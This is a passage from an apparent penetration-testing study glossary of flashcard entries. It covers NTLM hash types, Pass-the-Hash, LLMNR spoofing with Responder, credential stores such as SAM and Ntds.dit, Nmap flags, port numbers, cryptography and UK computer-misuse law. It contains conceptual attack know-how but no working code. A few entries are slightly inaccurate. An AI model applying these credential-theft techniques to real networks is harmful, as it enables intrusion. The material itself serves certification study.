of consequences of a threat occurring and the likelihood of it doing so<\/p>\n\n\n\n<p>inherent risk<br>the risk that an event will occur which may negatively affect the achievement of organisation&#8217;s objectives, assuming there are no controls in place<\/p>\n\n\n\n<p>residual risk<br>the risk which remains after taking controls in to account<\/p>\n\n\n\n<p>Session Initiation Protocol (SIP)<br>a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications<\/p>\n\n\n\n<p>SIP requests<br>REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS<\/p>\n\n\n\n<p>IPsec security architecture<br>Authentication Headers (AH)<br>Encapsulating Security Payloads (ESP)<br>Security Associations (SA) &#8211; Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)<\/p>\n\n\n\n<p>LM<br>all passwords are converted into uppercase before generating the hash value<\/p>\n\n\n\n<p>LM<br>password length is limited to maximum of 14 characters<\/p>\n\n\n\n<p>LM<br>a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately<\/p>\n\n\n\n<p>LM<br>if the password is 7 characters or less, then the second half of hash will always produce same constant value (AAD3B435B51404EE)<\/p>\n\n\n\n<p>LM<br>the hash value is sent to network servers without salting<\/p>\n\n\n\n<p>LM<br>uses DES<\/p>\n\n\n\n<p>128 bits<br>LAN Manager (LM) hash size:<\/p>\n\n\n\n<p>Net-NTLM<br>used for network authentication<\/p>\n\n\n\n<p>Net-NTLM<br>get these hashes when using tools like Responder or Inveigh<\/p>\n\n\n\n<p>Net-NTLMv1<br>uses DES<\/p>\n\n\n\n<p>Net-NTLMv2<br>uses HMAC-MD5<\/p>\n\n\n\n<p>128 bits<br>Network New Technology LAN Manager (Net-NTLM) hashes size:<\/p>\n\n\n\n<p>NTLM<br>get these hashes when dumping the SAM database of any Windows OS, a Domain Controller&#8217;s Ntds.dit database or from Mimikatz<\/p>\n\n\n\n<p>NTLM<br>uses MD4<\/p>\n\n\n\n<p>128 bits<br>New Technology LAN Manager (NTLM) hash size:<\/p>\n\n\n\n<p>NTLM<br>You CAN perform Pass-The-Hash attacks with these hashes<\/p>\n\n\n\n<p>Net-NTLM<br>You CANNOT perform Pass-The-Hash attacks with these hashes<\/p>\n\n\n\n<p>nbtstat; nbtscan<br>NetBIOS scanning tools:<\/p>\n\n\n\n<p>nbtstat<br>a command line utility that is integrated in windows systems and it can unveil information about the NetBIOS names and the remote machine name table or local but only for one host<\/p>\n\n\n\n<p>nbtscan<br>a NetBIOS nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one<\/p>\n\n\n\n<p>PEAP<br>a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel<\/p>\n\n\n\n<p>LEAP<br>a proprietary wireless LAN authentication method developed by Cisco Systems<\/p>\n\n\n\n<p>LEAP<br>uses WEP<\/p>\n\n\n\n<p>stream cipher (symmetric)<br>Rivest Cipher 4 (RC4)<\/p>\n\n\n\n<p>symmetric-key block cipher<br>Rivest Cipher 5 (RC5)<\/p>\n\n\n\n<p>symmetric-key block cipher<br>Data Encryption Standard (DES)<\/p>\n\n\n\n<p>symmetric-key block cipher<br>Advanced Encryption Standard (AES)<\/p>\n\n\n\n<p>Media Access Control (MAC) address<br>of a device is a unique identifier assigned to a network interface controller (NIC)<\/p>\n\n\n\n<p>48 bits<br>Media Access Control (MAC) address size:<\/p>\n\n\n\n<p>Oracle System ID (SID)<br>used to uniquely identify a particular database on a system<\/p>\n\n\n\n<p>rlogin; rcp; rsh<br>Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme<\/p>\n\n\n\n<p>permissions required for copying a file into \/ out of a directory<br>source directory: execute and read permission<br>source file: read permission<br>target directory: execute and write permission<br>target file: you don&#8217;t need any permission since it doesn&#8217;t exit before you copy it. or write permission if the file exists<\/p>\n\n\n\n<p>blind SQL injection<br>a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response &#8211; this attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection<\/p>\n\n\n\n<p>Link-Local Multicast Name Resolution (LLMNR)<br>a Microsoft Windows protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link<\/p>\n\n\n\n<p>Network Basic Input\/Output System (NetBIOS) name service<br>identifies systems on a local network by their NetBIOS name<\/p>\n\n\n\n<p>LLMNR spoofing<br>Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)\/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification\/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.<\/p>\n\n\n\n<p>FTP bounce attack<br>an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine as a middle man for the request<\/p>\n\n\n\n<p>Ntds.dit file<br>a database that stores Active Directory data, including information about user objects, groups, and group membership &#8211; it includes the password hashes for all users in the domain<\/p>\n\n\n\n<p>computer worm<br>What is Code Red?<\/p>\n\n\n\n<p>Internet Information Services (IIS) 5.0<br>MS01-033 basis<\/p>\n\n\n\n<p>Code Red<br>The MS01-033 vulnerability was used by which malware?<\/p>\n\n\n\n<p>computer worm<br>What is Conficker?<\/p>\n\n\n\n<p>Conficker<br>The MS08-067 vulnerability was used by which malware?<\/p>\n\n\n\n<p>computer worm<br>What is Blaster?<\/p>\n\n\n\n<p>Distributed Component Object Model (DCOM)<br>MS03-026 basis<\/p>\n\n\n\n<p>Blaster<br>The MS03-026 vulnerability was used by which malware?<\/p>\n\n\n\n<p>computer worm<br>What is Nimda?<\/p>\n\n\n\n<p>Local Security Authority Subsystem Service (LSASS)<br>MS04-011 basis<\/p>\n\n\n\n<p>Internet Explorer<br>MS10-002 basis<\/p>\n\n\n\n<p>Aurora<br>MS10-002 name<\/p>\n\n\n\n<p>KiTrap0D<br>MS10-015 name<\/p>\n\n\n\n<p>Print Spooler Service<br>MS10-061 basis<\/p>\n\n\n\n<p>OK<br>200<\/p>\n\n\n\n<p>Created<br>201<\/p>\n\n\n\n<p>Accepted<br>202<\/p>\n\n\n\n<p>Non-Authoritative Information<br>203<\/p>\n\n\n\n<p>No Content<br>204<\/p>\n\n\n\n<p>Reset Content<br>205<\/p>\n\n\n\n<p>300<br>Multiple Choices<\/p>\n\n\n\n<p>301<br>Moved Permanently<\/p>\n\n\n\n<p>302<br>Found<\/p>\n\n\n\n<p>307<br>Temporary Redirect<\/p>\n\n\n\n<p>308<br>Permanent Redirect<\/p>\n\n\n\n<p>0<br>Echo Reply<\/p>\n\n\n\n<p>3<br>Destination Unreachable<\/p>\n\n\n\n<p>4<br>Source Quench<\/p>\n\n\n\n<p>5<br>Redirect Message<\/p>\n\n\n\n<p>8<br>Echo Request<\/p>\n\n\n\n<p>9<br>Router Advertisement<\/p>\n\n\n\n<p>10<br>Router Solicitation<\/p>\n\n\n\n<p>11<br>Time Exceeded<\/p>\n\n\n\n<p>30<br>Traceroute<\/p>\n\n\n\n<p>42<br>Extended Echo Request<\/p>\n\n\n\n<p>43<br>Extended Echo Reply<\/p>\n\n\n\n<p>Address Resolution Protocol (ARP)<br>a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given Internet layer address, typically an IPv4 address<\/p>\n\n\n\n<p>Dynamic Host Configuration Protocol (DHCP)<br>a network management protocol used on UDP\/IP networks whereby a DHCP server dynamically assigns an IP address and other network configuration parameters to each device on a network so they can communicate with other IP networks<\/p>\n\n\n\n<p>Hot Standby Router Protocol (HSRP)<br>a Cisco proprietary redundancy protocol for establishing a fault-tolerant default gateway<\/p>\n\n\n\n<p>Virtual Router Redundancy Protocol (VRRP)<br>a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts<\/p>\n\n\n\n<p>VLAN Trunking Protocol (VTP)<br>a Cisco proprietary protocol that propagates the definition of Virtual Local Area Networks (VLAN) on the whole local area network<\/p>\n\n\n\n<p>Spanning Tree Protocol (STP)<br>a network protocol that builds a loop-free logical topology for Ethernet networks<\/p>\n\n\n\n<p>Terminal Access Controller Access-Control System Plus (TACACS+)<br>a protocol developed by Cisco that handles authentication, authorisation, and accounting (AAA) services<\/p>\n\n\n\n<p>Voice over Internet Protocol (VoIP)<br>a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet<\/p>\n\n\n\n<p>Session Initiation Protocol (SIP)<br>a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications<\/p>\n\n\n\n<p>IEEE 802.11<br>part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2, 4, 5, and 60 GHz frequency bands<\/p>\n\n\n\n<p>Kismet<br>passive scanner on Linux<\/p>\n\n\n\n<p>Wired Equivalent Privacy (WEP)<br>both XXX-40 and XXX-104 were deprecated in 2004<\/p>\n\n\n\n<p>Temporal Key Integrity Protocol (TKIP)<br>deprecated in 2012<\/p>\n\n\n\n<p>Wi-Fi Protected Access \/ Wi-Fi Protected Access II (WPA\/WPA2)<br>defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)<\/p>\n\n\n\n<p>Extensible Authentication Protocol (EAP)<br>an authentication framework frequently used in wireless networks and point-to-point connections<\/p>\n\n\n\n<p>Lightweight Extensible Authentication Protocol (LEAP)<br>a proprietary wireless LAN authentication method developed by Cisco<\/p>\n\n\n\n<p>Protected Extensible Authentication Protocol (PEAP)<br>a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel<\/p>\n\n\n\n<p>Teletype Network (Telnet)<br>a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection<\/p>\n\n\n\n<p>Teletype Network (Telnet)<br>does not encrypt any traffic sent over the connection by default<\/p>\n\n\n\n<p>Hypertext Transfer Protocol (HTTP)<br>an application protocol for distributed, collaborative, hypermedia information systems<\/p>\n\n\n\n<p>Hypertext Transfer Protocol (HTTP)<br>does not encrypt any traffic sent over the connection<\/p>\n\n\n\n<p>Hypertext Transfer Protocol Secure (HTTPS)<br>used for secure communication over a computer network, and widely used on the Internet<\/p>\n\n\n\n<p>File Transfer Protocol (FTP)<br>a standard network protocol used for the transfer of computer files between a client and server on a computer network<\/p>\n\n\n\n<p>File Transfer Protocol (FTP)<br>does not encrypt any traffic sent over the connection<\/p>\n\n\n\n<p>Secure Shell (SSH)<br>a cryptographic network protocol for operating network services securely over an unsecured network<\/p>\n\n\n\n<p>Simple Network Management Protocol (SNMP)<br>an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour<\/p>\n\n\n\n<p>using SNMP to attack a network<br>the SNMP implementation of Cisco 11.0 and 12.0 is vulnerable to certain denial of service attacks<\/p>\n\n\n\n<p>SNMP authentication<br>SNMP v1 sends passwords in clear-text over the network<\/p>\n\n\n\n<p>SNMP autodiscovery<br>in SNMP v1 and v2c the community string is broadcast in clear-text to other devices<\/p>\n\n\n\n<p>Trivial File Transfer Protocol (TFTP)<br>a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host<\/p>\n\n\n\n<p>Trivial File Transfer Protocol (TFTP)<br>includes no login or access control mechanisms<\/p>\n\n\n\n<p>Cisco Reverse Telnet<br>allows you to telnet to a device then from that device connect to the console of another device<\/p>\n\n\n\n<p>Network Time Protocol (NTP)<br>a networking protocol for clock synchronisation between computer systems over packet-switched, variable-latency data networks<\/p>\n\n\n\n<p>NTP message spoofing<br>used to move clocks on client computers<\/p>\n\n\n\n<p>Network Time Protocol (NTP)<br>used in distributed denial of service (DDoS) attacks<\/p>\n\n\n\n<p>SNMP, RMON [Cisco5506], Netflow [Cisco06]<br>router based techniques for local network traffic analysis<\/p>\n\n\n\n<p>[Active06], [Curtis00]<br>non-router based techniques for local network traffic analysis<\/p>\n\n\n\n<p>.pcap files<br>data files created using Wireshark and they contain the packet data of a network<\/p>\n\n\n\n<p>network socket<br>an internal endpoint for sending or receiving data within a node on a computer network<\/p>\n\n\n\n<p>netstat, ss<br>command line tools are used to list established sockets and related information<\/p>\n\n\n\n<p>C:\\windows\\system32\\config\\SAM<br>password hashes (Windows):<\/p>\n\n\n\n<p>\/etc\/shadow<br>password hashes (Unix):<\/p>\n\n\n\n<p>domain information, registrant contact, administrative contact, technical contact<br>information contained within IP and domain registries (WHOIS)<\/p>\n\n\n\n<p>DNS zone transfer<br>one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers<\/p>\n\n\n\n<p>zone<br>the portion of the database that is replicated<\/p>\n\n\n\n<p>Start Of [a zone of] Authority (SOA)<br>specifies authoritative information about a DNS zone<\/p>\n\n\n\n<p>Mail eXchange (MX)<br>domain to mail server<\/p>\n\n\n\n<p>Text (TXT)<br>more often carries machine-readable data, opportunistic encryption, etc.<\/p>\n\n\n\n<p>Address (A)<br>domain to IP<\/p>\n\n\n\n<p>Name Server (NS)<br>domain to a set of name servers<\/p>\n\n\n\n<p>Pointer (PTR)<br>IP to a domain<\/p>\n\n\n\n<p>HINFO<br>intended to provide information about host CPU type and operating system<\/p>\n\n\n\n<p>Canonical Name (CNAME)<br>subdomain to a domain&#8217;s A record<\/p>\n\n\n\n<p>Usenet newsgroup<br>a repository usually within the Usenet system, for messages posted from many users in different locations using Internet<\/p>\n\n\n\n<p>-rwxr-xr-x<br>a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions<\/p>\n\n\n\n<p>0740<br>-rwxr&#8212;&#8211;<\/p>\n\n\n\n<p>archive, hidden, system, read-only<br>traditionally, in Microsoft Windows, files and folders accepted four attributes:<\/p>\n\n\n\n<p>filesystem Access Control List (ACL)<br>a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files<\/p>\n\n\n\n<p>encryption<br>transforms data into another format in such a way that only specific individual(s) can reverse the transformation<\/p>\n\n\n\n<p>encoding<br>transforms data into another format using a scheme that is publicly available so that it can easily be reversed<\/p>\n\n\n\n<p>symmetric encryption<br>uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext<\/p>\n\n\n\n<p>asymmetric encryption<br>uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner<\/p>\n\n\n\n<p>symmetric-key block cipher<br>DES &#8211; Data Encryption Standard<\/p>\n\n\n\n<p>64 bits<br>DES block sizes:<\/p>\n\n\n\n<p>56 bits<br>DES key sizes:<\/p>\n\n\n\n<p>symmetric-key block cipher<br>3DES &#8211; Triple Data Encryption Standard<\/p>\n\n\n\n<p>64 bits<br>3DES block sizes:<\/p>\n\n\n\n<p>168, 112, or 56 bits<br>3DES key sizes:<\/p>\n\n\n\n<p>symmetric-key block cipher<br>AES &#8211; Advanced Encryption Standard<\/p>\n\n\n\n<p>128 bits<br>AES block sizes:<\/p>\n\n\n\n<p>128, 192, or 256 bits<br>AES key sizes:<\/p>\n\n\n\n<p>public-key cryptosystem<br>RSA &#8211; Rivest-Shamir-Adleman<\/p>\n\n\n\n<p>1024 &#8211; 4096 bits<br>RSA key sizes:<\/p>\n\n\n\n<p>Secure Hash Algorithm 1 (SHA1)<br>cryptographic hash function which takes an input and produces a 160-bit hash value known as a message digest &#8211; typically rendered as a hexadecimal number, 40 digits long<\/p>\n\n\n\n<p>512 bits<br>SHA1 block sizes:<\/p>\n\n\n\n<p>Message-Digest algorithm (MD5)<br>hash function producing a 128-bit hash value<\/p>\n\n\n\n<p>512 bits<br>MD5 block sizes:<\/p>\n\n\n\n<p>message integrity codes<br>a short piece of information used to authenticate a message &#8211; in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed<\/p>\n\n\n\n<p>Hash-based Message Authentication Code (HMAC)<br>a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key<\/p>\n\n\n\n<p>firewall<br>a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules<\/p>\n\n\n\n<p>firewall<br>often categorised as either network firewalls or host-based firewalls<\/p>\n\n\n\n<p>network access control list<br>a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces<\/p>\n\n\n\n<p>router<br>a networking device that forwards data packets between computer networks<\/p>\n\n\n\n<p>switch<br>a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device<\/p>\n\n\n\n<p>Secure Sockets Layer (SSL)<br>a set of cryptographic protocols designed to provide communications security over a computer network<\/p>\n\n\n\n<p>Internet Protocol Security (IPsec)<br>a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)<\/p>\n\n\n\n<p>Secure Shell (SSH)<br>a cryptographic network protocol for operating network services securely over an unsecured network<\/p>\n\n\n\n<p>Secure Shell (SSH)<br>typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH<\/p>\n\n\n\n<p>Pretty Good Privacy (PGP)<br>an encryption programme that provides cryptographic privacy and authentication for data communication<\/p>\n\n\n\n<p>Pretty Good Privacy (PGP)<br>used or signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications<\/p>\n\n\n\n<p>Wired Equivalent Privacy (WEP)<br>standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key<\/p>\n\n\n\n<p>Temporal Key Integrity Protocol (TKIP)<br>designed as an interim solution to replace WEP without requiring the replacement of legacy hardware<\/p>\n\n\n\n<p>Wi-Fi Protected Access (WPA)<br>defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)<\/p>\n\n\n\n<p>egress filtering<br>the practice of monitoring and potentially restricting the flow of information outbound from one network to another<\/p>\n\n\n\n<p>egress filtering<br>TCP\/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device<\/p>\n\n\n\n<p>ingress filtering<br>a technique used to ensure that incoming packets are actually from the networks from which they claim to originate<\/p>\n\n\n\n<p>banner grabbing<br>a technique used to gain information about a computer system on a network and the services running on its open ports<\/p>\n\n\n\n<p>examples of ports used for banner grabbing<br>Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively<\/p>\n\n\n\n<p>active fingerprinting<br>works by sending packets to a target and analysing the packets that are sent back<\/p>\n\n\n\n<p>Nmap<br>almost all active fingerprinting is done with:<\/p>\n\n\n\n<p>passive fingerprinting<br>sniffs TCP\/IP ports, rather than generating network traffic by sending packets to them<\/p>\n\n\n\n<p>application layer<br>7<\/p>\n\n\n\n<p>presentation layer<br>6<\/p>\n\n\n\n<p>session layer<br>5<\/p>\n\n\n\n<p>transport layer<br>4<\/p>\n\n\n\n<p>network layer<br>3<\/p>\n\n\n\n<p>data link layer<br>2<\/p>\n\n\n\n<p>physical layer<br>1<\/p>\n\n\n\n<p>port scanner<br>an application to probe a server or host for open ports<\/p>\n\n\n\n<p>Nmap<br>used to discover hosts and services on a computer network by sending packets and analysing the responses<\/p>\n\n\n\n<p>-sS<br>TCP SYN (Stealth) Scan<\/p>\n\n\n\n<p>-sT<br>TCP Connect Scan<\/p>\n\n\n\n<p>-sU<br>UDP Scan<\/p>\n\n\n\n<p>-sO<br>IP Protocol Scan<\/p>\n\n\n\n<p>-p<br>selecting ports<\/p>\n\n\n\n<p>-T0 through -T5<br>these timing templates affect many variables to adjust overall Nmap speed from very slow (-T0) to extremely aggressive (T5)<\/p>\n\n\n\n<p>&#8211;max-rtt-timeout<br>the maximum amount of time to wait for a port scan probe response<\/p>\n\n\n\n<p>&#8211;max-retries<br>the maximum number of port scan probe retransmissions to a single port<\/p>\n\n\n\n<p>&#8211;scan-delay<br>wait at least the given amount of time between sending probes to any individual host<\/p>\n\n\n\n<p>-v<br>increase the verbosity level<\/p>\n\n\n\n<p>-vv<br>further increase the verbosity level<\/p>\n\n\n\n<p>-oA<br>output to all formats (.nmap, .xml, .gnmap)<\/p>\n\n\n\n<p>-6<br>scan the target using the IPv6 protocol<\/p>\n\n\n\n<p>network sniffer<br>computer programme or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network<\/p>\n\n\n\n<p>ping<br>measures the round-trip time for messages sent from the originating host to a destination computer that are echoed back to the source<\/p>\n\n\n\n<p>ping<br>operates by sending Internet Control Message Protocol (ICMP) echo request packets to the target host and waiting for an ICMP echo reply<\/p>\n\n\n\n<p>-s<br>specifies the number of data bytes to be sent<\/p>\n\n\n\n<p>-c<br>stop after sending count ECHO_REQUEST packets<\/p>\n\n\n\n<p>-w<br>specify a timeout, in seconds, before ping exits regardless of how many packets have been sent or received<\/p>\n\n\n\n<p>-t<br>set the IP Time To Live (TTL)<\/p>\n\n\n\n<p>-i<br>wait interval seconds between sending each packet<\/p>\n\n\n\n<p>-R<br>record route<\/p>\n\n\n\n<p>ping sweep<br>a method that can establish a range of IP addresses which map to live hosts<\/p>\n\n\n\n<p>fping<br>a tool used for ping sweeps<\/p>\n\n\n\n<p>Internet Protocol version 4 (IPv4)<br>uses 32-bit addresses (represented as 4 groups of 4 decimal numbers with the groups being separated by full stop)<\/p>\n\n\n\n<p>Internet Protocol version 6 (IPv6)<br>uses 128-bit addresses (represented as 8 groups of 4 hexadecimal digits with the groups being separated by colons)<\/p>\n\n\n\n<p>Transmission Control Protocol (TCP)<br>provides reliable, ordered, and error-checked delivery of a stream of octets between applications running on hosts communicating via an IP network<\/p>\n\n\n\n<p>User Datagram Protocol (UDP)<br>has no handshaking dialogues, and thus exposes the user&#8217;s programme to any unreliability of the underlying network; there is no guarantee of delivery, ordering, or duplicate protection<\/p>\n\n\n\n<p>Internet Control Message Protocol (ICMP)<br>used by network devices, including routers, to send error messages and operational information<\/p>\n\n\n\n<p>8 bits<br>1 byte<\/p>\n\n\n\n<p>8 bits<br>1 octet<\/p>\n\n\n\n<p>Category 5 cable (CAT 5)<br>a twisted pair cable for computer networks<\/p>\n\n\n\n<p>Category 5 cable (CAT 5)<br>suitable for most varieties of Ethernet over twisted pair<\/p>\n\n\n\n<p>fibre-optic communication<br>a method of transmitting information from one place to another by sending pulses of light through an optical fibre<\/p>\n\n\n\n<p>10\/100\/1000baseT<br>standards of twisted-pair cables for the physical layer of an Ethernet computer network<\/p>\n\n\n\n<p>Token Ring<br>a communications protocol for local area networks<\/p>\n\n\n\n<p>Token Ring<br>uses a special three-byte frame called a &#8216;token&#8217; that travels around a logical &#8216;ring&#8217; of workstations or servers<\/p>\n\n\n\n<p>wireless (802.11)<br>part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2.4, 5, and 60 GHz frequency bands<\/p>\n\n\n\n<p>shared media<br>nodes share a single communication medium (e.g. Ethernet); every message reaches every node<\/p>\n\n\n\n<p>switched media<br>communication is point-to-point through dedicated lines<\/p>\n\n\n\n<p>Virtual LAN (VLANs)<br>any broadcast domain that is partitioned and isolated in a computer network at the data link layer<\/p>\n\n\n\n<p>Computer Misuse Act<br>CMA<\/p>\n\n\n\n<p>Domain Name System<br>DNS<\/p>\n\n\n\n<p>Electronic Code Book<br>ECB<\/p>\n\n\n\n<p>Flexible Single Master Operations<br>FSMO<\/p>\n\n\n\n<p>Hypertext Markup Language<br>HTML<\/p>\n\n\n\n<p>Hypertext Transfer Protocol<br>HTTP<\/p>\n\n\n\n<p>Inter Asterisk eXchange<br>IAX<\/p>\n\n\n\n<p>Internet Server Application Programming Interface<br>ISAPI<\/p>\n\n\n\n<p>Network File System<br>NFS<\/p>\n\n\n\n<p>Protected Extensible Authentication Protocol<br>PEAP<\/p>\n\n\n\n<p>Public Key Infrastructure<br>PKI<\/p>\n\n\n\n<p>Remote Authentication Dial In User Service<br>RADIUS<\/p>\n\n\n\n<p>Rivest Shamir Adleman<br>RSA<\/p>\n\n\n\n<p>Supervisory Control And Data Acquisition<br>SCADA<\/p>\n\n\n\n<p>Session Initiation Protocol<br>SIP<\/p>\n\n\n\n<p>Start Of Authority<br>SOA<\/p>\n\n\n\n<p>Simple Object Access Protocol<br>SOAP<\/p>\n\n\n\n<p>Structured Query Language<br>SQL<\/p>\n\n\n\n<p>Secure Shell<br>SSH<\/p>\n\n\n\n<p>Spanning Tree Protocol<br>STP<\/p>\n\n\n\n<p>Temporal Key Integrity Protocol<br>TKIP<\/p>\n\n\n\n<p>Universal Description Discovery and Integration<br>UDDI<\/p>\n\n\n\n<p>User Datagram Protocol<br>UDP<\/p>\n\n\n\n<p>Wired Equivalent Privacy<br>WEP<\/p>\n\n\n\n<p>Wi-fi Protected Access<br>WPA<\/p>\n\n\n\n<p>Web Services Description Language<br>WSDL<\/p>\n\n\n\n<p>application pen testing<br>finds technical vulnerabilities<\/p>\n\n\n\n<p>infrastructure pen testing<br>examines servers, firewalls and other hardware for security vulnerabilities<\/p>\n\n\n\n<p>black box<br>no information is provided to the penetration tester<\/p>\n\n\n\n<p>white box<br>full information is provided, for example network maps and access to development staff<\/p>\n\n\n\n<p>Computer Misuse Act 1990<br>originally nothing to make DOS attacks illegal<\/p>\n\n\n\n<p>Computer Misuse Act 1990<br>modifications in Police and Justice Act 2006 changed Section 3<\/p>\n\n\n\n<p>Computer Misuse Act 1990<br>made DDOS via botnets illegal<\/p>\n\n\n\n<p>Human Rights Act 1998<br>Article 8 &#8211; right to respect for private and family life, home and correspondence<\/p>\n\n\n\n<p>Data Protection Act 1998<br>Section 55 &#8211; unlawful obtaining etc. of personal data<\/p>\n\n\n\n<p>Police and Justice Act 2006<br>made amendments to the Computer Misuse Act 1990<\/p>\n\n\n\n<p>Police and Justice Act 2006<br>made it illegal to perform DOS attacks<\/p>\n\n\n\n<p>Police and Justice Act 2006<br>made it illegal to supply and own hacking tools<\/p>\n\n\n\n<p>Police and Justice Act 2006<br>increased penalties of Computer Misuse Act 1990<\/p>\n\n\n\n<p>risk of pen testing<br>degradation or loss of services<\/p>\n\n\n\n<p>risk of pen testing<br>disclosure of sensitive information<\/p>\n\n\n\n<p>TCP 548<br>Apple Filing Protocol (AFP) over TCP<\/p>\n\n\n\n<p>TCP 179<br>Border Gateway Protocol (BGP)<\/p>\n\n\n\n<p>UDP 67<br>Bootstrap Protocol (BOOTP) server; Dynamic Host Configuration Protocol (DHCP)<\/p>\n\n\n\n<p>UDP 68<br>Bootstrap Protocol (BOOTP) client; Dynamic Host Configuration Protocol (DHCP)<\/p>\n\n\n\n<p>TCP&amp;UDP 19<br>Character Generator Protocol (CHARGEN)<\/p>\n\n\n\n<p>TCP&amp;UDP 13<br>Daytime Protocol<\/p>\n\n\n\n<p>TCP&amp;UDP 135<br>Distributed Computing Environment (DCE) endpoint resolution; Microsoft End Point Mapper (EPMAP); Distributed Component Object Model (DCOM)<\/p>\n\n\n\n<p>TCP&amp;UDP 546<br>Dynamic Host Configuration Protocol version 6 (DHCPv6) client<\/p>\n\n\n\n<p>TCP&amp;UDP 547<br>Dynamic Host Configuration Protocol version 6 (DHCPv6) server<\/p>\n\n\n\n<p>TCP&amp;UDP 9<br>Discard Protocol<\/p>\n\n\n\n<p>TCP&amp;UDP 53<br>Domain Name System (DNS)<\/p>\n\n\n\n<p>TCP&amp;UDP 7<br>Echo Protocol<\/p>\n\n\n\n<p>TCP 79<br>Finger Protocol<\/p>\n\n\n\n<p>TCP 21<br>File Transfer Protocol (FTP) control<\/p>\n\n\n\n<p>TCP 20<br>File Transfer Protocol (FTP) data transfer<\/p>\n\n\n\n<p>TCP&amp;UDP 989<br>File Transfer Protocol over TLS\/SSL (FTPS) data transfer<\/p>\n\n\n\n<p>TCP&amp;UDP 990<br>File Transfer Protocol over TLS\/SSL (FTPS) control<\/p>\n\n\n\n<p>TCP 70<br>Gopher Protocol<\/p>\n\n\n\n<p>TCP 80<br>Hypertext Transfer Protocol (HTTP)<\/p>\n\n\n\n<p>TCP 443<br>Hypertext Transfer Protocol over TLS\/SSL (HTTPS)<\/p>\n\n\n\n<p>TCP 113<br>Identification (ident) Protocol; Authentication Service<\/p>\n\n\n\n<p>TCP 143<br>Internet Message Access Protocol (IMAP)<\/p>\n\n\n\n<p>TCP&amp;UDP 631<br>Internet Printing Protocol (IPP)<\/p>\n\n\n\n<p>TCP&amp;UDP 194<br>Internet Relay Chat (IRC)<\/p>\n\n\n\n<p>TCP 6665-6669<br>Internet Relay Chat (IRC) (common alternatives)<\/p>\n\n\n\n<p>UDP 500<br>Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE)<\/p>\n\n\n\n<p>TCP 860<br>Internet Small Computer Systems Interface (iSCSI)<\/p>\n\n\n\n<p>TCP 389<br>Lightweight Directory Access Protocol (LDAP)<\/p>\n\n\n\n<p>TCP 636<br>Lightweight Directory Access Protocol over TLS\/SSL (LDAPS)<\/p>\n\n\n\n<p>TCP 515<br>Line Printer Daemon (LPD) protocol<\/p>\n\n\n\n<p>UDP 138<br>Network Basic Input\/Output System (NetBIOS) Datagram Service<\/p>\n\n\n\n<p>TCP 139<br>Network Basic Input\/Output System (NetBIOS) Session Service<\/p>\n\n\n\n<p>TCP&amp;UDP 137<br>Network Basic Input\/Output System (NetBIOS) Name Service<\/p>\n\n\n\n<p>TCP 119<br>Network News Transfer Protocol (NNTP)<\/p>\n\n\n\n<p>TCP&amp;UDP 563<br>Network News Transfer Protocol over TLS\/SSL (NNTPS)<\/p>\n\n\n\n<p>UDP 123<br>Network Time Protocol (NTP)<\/p>\n\n\n\n<p>TCP 110<br>Post Office Protocol version 3 